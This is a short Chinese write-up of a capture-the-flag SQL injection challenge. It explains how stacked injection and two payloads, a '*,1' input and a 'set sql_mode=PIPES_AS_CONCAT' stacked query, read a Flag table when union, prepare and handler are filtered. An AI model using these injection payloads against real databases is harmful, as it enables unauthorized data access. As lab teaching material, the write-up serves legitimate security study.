打开题目发现
发现存在堆叠注入
然后尝试读取表Flag,
发现union,prepare,handler等都过滤了,基本我会的方法都过滤了。。。
然后有两种解
解题思路1:
payload:*,1
查询语句:select *,1||flag from Flag
解题思路2:
payload:1;set sql_mode=PIPES_AS_CONCAT;select 1
解析:
在oracle 缺省支持 通过 ‘ || ’ 来实现字符串拼接。
但在mysql 缺省不支持。需要调整mysql 的sql_mode
模式:pipes_as_concat 来实现oracle 的一些功能。